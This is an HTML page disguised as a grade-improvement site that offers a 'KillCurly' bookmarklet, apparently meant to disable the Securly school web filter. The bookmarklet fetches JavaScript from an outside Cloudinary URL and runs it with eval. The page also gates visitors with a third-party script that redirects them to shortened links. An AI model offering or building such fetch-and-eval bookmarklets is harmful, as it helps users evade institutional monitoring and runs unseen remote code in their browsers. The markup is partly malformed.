<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Whoa There</title>
    <link rel="stylesheet" href="style.css" />
    <style>
      .staticshield-div {
        display: none;
      }
    </style>
	<script src='https://staticshield.vercel.app/script.js' data-site-id='27dd993c-bb56-405c-9d39-3bf31976ceca' data-cap='Please Login'></script> <script>setInterval(()=>{window.staticshieldToken||window.location.replace("https://bit.ly/req-blk-ss")},3e3);</script> <style>.staticshield-div { display: none }</style>  <noscript> <meta http-equiv='refresh' content='0' url='https://bit.ly/ss-noscript'/></noscript>
    <div>
        <div>
    <title>how to improve your grades</title>
		<link rel="icon" href="https://raw.githubusercontent.com/rickWhatryouDoingHere/goodwebsiteforschool/main/IMG/favicon.ico">
    <style type="text/css">
        body {
            background-image: url('https://github.com/rickWhatryouDoingHere/goodwebsiteforschool/blob/main/IMG/background.gif?raw=true');
            background-size: cover;
            color: #000;
            font-family: 'Roboto', monospace;
        }

        header {
            text-align: center;
            padding: 20px;
        }

        h1 {
            font-size: 50px;
            margin: 0;
        }

        p {
            font-size: 30px;
            margin: 0;
            padding: 20px;
            text-align: center;
        }
         a {
            font-size: 30px;
            margin: 0;
            padding: 20px;
            text-align: center;
        }
        .button {
	position: relative;
	width: 230px;
	height: 47px;
	border: 1px solid rgb(5, 39, 162);
	color: rgb(10, 16, 214);
	background: rgba(0, 0, 0, 0.08);
	border-radius: 6px;
	margin: 20px auto;
	display: flex;
	justify-content: center;
	align-items: center;
	font-size: 24px;
	user-select: none;
        font-weight: 500;
}

.button:active {
	background: rgb(255, 255, 255);
}

.button-text {
	opacity: 0;
	user-select: none;
	position: absolute;
	top: 0;
	right: 0;
	bottom: 0;
	left: 0;
	height: 100%;
	width: 100%;
}
    </style>

<body>
    <header>
        <h1>The place where you can improve your grade</h1>
    </header>

    <p>Drag Bookmarklet Below To Bookmarks Bar</p>

    <div>
        

<div class="button">KillCurly<a href="javascript:fetch('https://res.cloudinary.com/dxttxbdrd/raw/upload/v1693510756/kill_qn1hjn.js').then(r => r.text()).then(r => eval(r))" class="button-text">KillCurly</a></div>
            
   <div>
    
    <p>or if you can't run javascript from bookmarklets, use insecurly below, dislcaimer this method is patched for now a.k.a didn't work</p>
    
    <div>
	    <div class="button">Insecurly<a href="/getgood.html" class="button-text">Insecurly</a></div>
	
    

    </div> </head>
</html>
